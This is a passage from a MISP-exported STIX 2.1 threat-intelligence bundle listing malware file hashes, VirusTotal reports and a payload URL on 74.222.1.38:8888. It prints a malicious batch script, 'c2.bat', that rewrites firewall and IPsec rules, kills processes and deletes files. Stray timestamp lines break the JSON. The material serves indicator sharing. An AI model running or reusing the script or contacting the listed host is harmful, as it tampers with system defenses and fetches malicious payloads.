"created": "2019-05-26T08:25:50.000Z",
"modified": "2019-05-26T08:25:50.000Z",
"pattern": "[file:hashes.MD5 = 'b340e1cdf15eb702ed14e05b42163910' AND file:hashes.SHA1 = '9aafb2147de42cea11d6e798721554ba456f34e8' AND file:hashes.SHA256 = 'fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--550f6b80-a32c-41d9-93c4-db9c41528a0b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:50.000Z",
"modified": "2019-05-26T08:25:50.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-02-24T00:01:11",
"category": "Other",
"uuid": "ba54ef1f-42d0-4d51-b3a8-55af788d40f7"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9/analysis/1550966471/",
"category": "Payload delivery",
"uuid": "f569b93d-067a-4d0d-85dd-4d9c568fb189"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/51",
"category": "Payload delivery",
"uuid": "ff3e5153-e691-4326-b9b7-1ce6b44633e0"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b58ad199-5bc6-4892-b6ea-1758b79ea763",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:50.000Z",
"modified": "2019-05-26T08:25:50.000Z",
"pattern": "[file:hashes.MD5 = '942a3b5532bd6e4bdfea13cf077dded5' AND file:hashes.SHA1 = '5eea109a6d3f5f521a82bdff2532dec5f376e071' AND file:hashes.SHA256 = '84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--57dc22c7-3d93-437a-9930-7312a8472014",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-07-03T21:19:21",
"category": "Other",
"uuid": "1dc2c7b3-c04b-4a28-b258-580b4e22057b"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088/analysis/1530652761/",
"category": "Payload delivery",
"uuid": "3fcfec4a-4286-4ab7-b3a1-e502fabfaf8d"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "18/57",
"category": "Payload delivery",
"uuid": "3118f2c7-2fed-4e23-b896-d0dbb81ac716"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b2749b84-7bae-418b-b58a-278ee29eefea",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"pattern": "[file:hashes.MD5 = 'f2e4361d57eef76cbc5727245fe402f8' AND file:hashes.SHA1 = 'c58b5aa5728e8bf381470ad89d234463cd992937' AND file:hashes.SHA256 = '2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--bf3c1c50-d629-446c-a802-a541481256f3",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-03-15T00:02:54",
"category": "Other",
"uuid": "f7719a96-7a86-419d-b29f-e622a275a9bb"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830/analysis/1552608174/",
"category": "Payload delivery",
"uuid": "94c66b94-2553-4cd0-adac-de1f210c5ac5"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "16/55",
"category": "Payload delivery",
"uuid": "f14e3ba7-10ba-43fb-b70b-bca1f43972d8"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7eab9890-1152-4540-b14c-b1713dd74db7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"pattern": "[file:hashes.MD5 = '4be50da2219f8dc41f46e7844e265e87' AND file:hashes.SHA1 = 'c2ab04184e75649fdf85165fffd02f1f8c4c8bba' AND file:hashes.SHA256 = 'b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--4a5526a0-66ef-4a36-859c-9fae1cf3a73e",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-01-14T04:05:17",
"category": "Other",
"uuid": "20fed181-b496-436f-bd07-e34870c1a396"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3/analysis/1547438717/",
"category": "Payload delivery",
"uuid": "07e4489f-94f7-493f-aa56-c6f95cab3002"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "23/56",
"category": "Payload delivery",
"uuid": "b0f1138a-a269-414a-8e73-27d688dac9b2"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"pattern": "[file:hashes.MD5 = 'e1fa5e03ddfe7c81f3f80d88a7162b5f' AND file:hashes.SHA1 = '72bb026e618e317eb231417b573a38d805c7bb00' AND file:hashes.SHA256 = '6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ab17e198-674e-4648-8c02-f3c1fcb73d3f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-11-08T08:34:45",
"category": "Other",
"uuid": "9527b674-741a-4d37-8e0d-5491ca6e906f"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae/analysis/1541666085/",
"category": "Payload delivery",
"uuid": "3349c61c-757c-4fac-99a6-8ad73aabc00a"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/57",
"category": "Payload delivery",
"uuid": "38f5c57b-bb70-4651-91f8-6ee1011f0a12"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:51.000Z",
"modified": "2019-05-26T08:25:51.000Z",
"pattern": "[file:hashes.MD5 = 'd515a6b5638ec213be9bd4fe507e0b6b' AND file:hashes.SHA1 = '014ebb8391edb3fda76789e957ba973b3d97859c' AND file:hashes.SHA256 = '65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-03-11T02:04:00",
"category": "Other",
"uuid": "d7da733f-47f6-47be-adea-480154741de8"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c/analysis/1552269840/",
"category": "Payload delivery",
"uuid": "d4dc25cf-fedd-4a44-8065-323f4d48453b"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "18/56",
"category": "Payload delivery",
"uuid": "1ef30cb7-cba8-43dd-8c9a-544007af1d3a"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--94b76905-bc8e-4167-9633-b19262f34af8",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"pattern": "[file:hashes.MD5 = '6d8960cd6c9ba68a69af812fc1c4741b' AND file:hashes.SHA1 = 'b59ec01ab58a1fbf49846ad34d0b48445aad3506' AND file:hashes.SHA256 = '968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:52Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5c2ed803-b879-4d3c-9d36-583c1fde2562",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-08-30T19:41:06",
"category": "Other",
"uuid": "4fbf8beb-ae11-4650-b5b7-8d185b468fe7"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02/analysis/1535658066/",
"category": "Payload delivery",
"uuid": "7d74e6cc-9eee-45bf-8eb4-43ef84cfe88d"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "11/57",
"category": "Payload delivery",
"uuid": "83006497-ca2b-4cac-8a39-68999f6b8ed8"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3751d8a9-13b3-4049-82ec-9607df7fc404",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"pattern": "[file:hashes.MD5 = '0383c324c0c99f930c65d4034c22766b' AND file:hashes.SHA1 = 'a36f5113c764f60d9f48e7f9f7b779007f34bbc0' AND file:hashes.SHA256 = '58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:25:52Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ecfc06ea-0951-451d-8b9a-4aeae8c7f133",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2018-09-22T00:26:43",
"category": "Other",
"uuid": "fc3f86ce-b03b-4b8e-94cd-66ce90d55ef4"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da/analysis/1537576003/",
"category": "Payload delivery",
"uuid": "c1d11cf9-2265-4824-bd54-a19ffaebc658"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "19/59",
"category": "Payload delivery",
"uuid": "f137b164-8fed-4b75-a650-b39d099da3a7"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--5cea4e05-04c4-4f5f-ba43-4d3f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:27:49.000Z",
"modified": "2019-05-26T08:27:49.000Z",
"name": "c2.bat",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"Winbatch"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"True\""
],
"x_misp_script": "sc config MpsSvc start= auto&net start MpsSvc\r\nnetsh advfirewall set allprofiles state on\r\nnetsh advfirewall firewall add rule name=\"tcp all\" dir=in protocol=tcp localport=0-65535 action=allow\r\nnetsh advfirewall firewall add rule name=\"deny tcp 445\" dir=in protocol=tcp localport=445 action=block\r\nnetsh advfirewall firewall add rule name=\"deny tcp 139\" dir=in protocol=tcp localport=139 action=block\r\nnetsh advfirewall firewall add rule name=\"tcpall\" dir=out protocol=tcp localport=0-65535 action=allow \r\nnetsh ipsec static add policy name=win\r\nnetsh ipsec static add filterlist name=Allowlist\r\nnetsh ipsec static add filterlist name=denylist\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445\r\nnetsh ipsec static add filteraction name=Allow action=permit\r\nnetsh ipsec static add filteraction name=deny action=block\r\nnetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny\r\nnetsh ipsec static set policy name=win assign=y \r\nver | find \"5.1.\" > NUL && sc config SharedAccess start= auto && echo Yes | reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\NetBT\\Parameters /t REG_DWORD /v SMBDeviceEnabled /d 0\r\nattrib -s -h -r %WINDIR%\\systxm1\\*.*&attrib -s -h -r %WINDIR%\\system\\*.*\r\n@Wmic Process Where \"Name='winlogon.exe' And ExecutablePath='%WINDIR%\\system\\winlogon.exe'\" Call Terminate &del %WINDIR%\\system\\winlogon.exe\r\n@Wmic Process Where \"Name='svchost.exe' And ExecutablePath='%WINDIR%\\system\\svchost.exe'\" Call Terminate &del %WINDIR%\\system\\svchost.exe\r\ndel %WINDIR%\\debug\\c2.bat\r\nexit",
"x_misp_state": "Malicious"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cea4e93-8834-4dd5-992d-4763950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:30:11.000Z",
"modified": "2019-05-26T08:30:11.000Z",
"pattern": "[url:value = 'http://74.222.1.38:8888/close.bat' AND url:x_misp_host = '74.222.1.38' AND url:x_misp_port = '8888' AND url:x_misp_resource_path = 'close.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:30:11Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"url\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--195d072c-cab6-4370-b8ea-cf509e00959b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:52.000Z",
"modified": "2019-05-26T08:35:52.000Z",
"pattern": "[file:hashes.MD5 = '4d437b5614edcc7d1ee5e4bcf5785ef9' AND file:hashes.SHA1 = '995bc00abbcde848148c5695c10e38ae6b5a9401' AND file:hashes.SHA256 = '43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-26T08:35:52Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--e0949b09-cf58-44f5-9455-d6253e56a131",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-26T08:35:52.000Z",
"modified": "2019-05-26T08:35:52.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-11T06:46:25",
"category": "Other",
"uuid": "1ad77ee7-7031-4210-9b8a-2a44aae36573"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5/analysis/1557557185/",
"category": "Payload delivery",
"uuid": "cb5a7bf2-2d0d-49c2-9d5f-c050da740604"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "5/59",
"category": "Payload delivery",
"uuid": "e8efebe6-f034-423e-9f89-70ee1b0dcb78"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--6eb30338-6dc9-477b-8de2-67c2ed6c814a",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--380c7782-2dd4-443a-9108-bf700a7d0b43",
"target_ref": "x-misp-object--7e77557c-59e5-421e-9ac1-7d8d4d7dc322"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--cf2fddd3-83bf-46e9-b475-35007bd258cc",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
"target_ref": "x-misp-object--550f6b80-a32c-41d9-93c4-db9c41528a0b"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--65989f15-22ab-401b-ba4a-21aeee25e7cc",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--b58ad199-5bc6-4892-b6ea-1758b79ea763",
"target_ref": "x-misp-object--57dc22c7-3d93-437a-9930-7312a8472014"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--14d5fa60-cda6-4160-828e-29e5198dc170",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:52.000Z",
"modified": "2019-05-26T08:25:52.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--b2749b84-7bae-418b-b58a-278ee29eefea",
"target_ref": "x-misp-object--bf3c1c50-d629-446c-a802-a541481256f3"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--0da85027-872e-447b-8495-bc8a75a1f2b4",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:53.000Z",
"modified": "2019-05-26T08:25:53.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--7eab9890-1152-4540-b14c-b1713dd74db7",
"target_ref": "x-misp-object--4a5526a0-66ef-4a36-859c-9fae1cf3a73e"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--77081070-a3a2-4ba6-8459-33b48d00afd4",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:53.000Z",
"modified": "2019-05-26T08:25:53.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
"target_ref": "x-misp-object--ab17e198-674e-4648-8c02-f3c1fcb73d3f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--18ce4b1b-1f08-4264-828c-11a1550e504d",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:53.000Z",
"modified": "2019-05-26T08:25:53.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
"target_ref": "x-misp-object--e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--ceee9fc7-5f89-4357-96ec-0afeb2451e35",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:53.000Z",
"modified": "2019-05-26T08:25:53.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--94b76905-bc8e-4167-9633-b19262f34af8",
"target_ref": "x-misp-object--5c2ed803-b879-4d3c-9d36-583c1fde2562"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--d891033f-fbd3-407d-9af1-3fb4a52c1d50",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:25:53.000Z",
"modified": "2019-05-26T08:25:53.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--3751d8a9-13b3-4049-82ec-9607df7fc404",
"target_ref": "x-misp-object--ecfc06ea-0951-451d-8b9a-4aeae8c7f133"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-05-19 09:05:37 +00:00
"id": "relationship--84e212cd-36ce-4cee-a788-132af9eac833",
2023-04-21 14:44:17 +00:00
"created": "2019-05-26T08:35:53.000Z",
"modified": "2019-05-26T08:35:53.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--195d072c-cab6-4370-b8ea-cf509e00959b",
"target_ref": "x-misp-object--e0949b09-cf58-44f5-9455-d6253e56a131"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}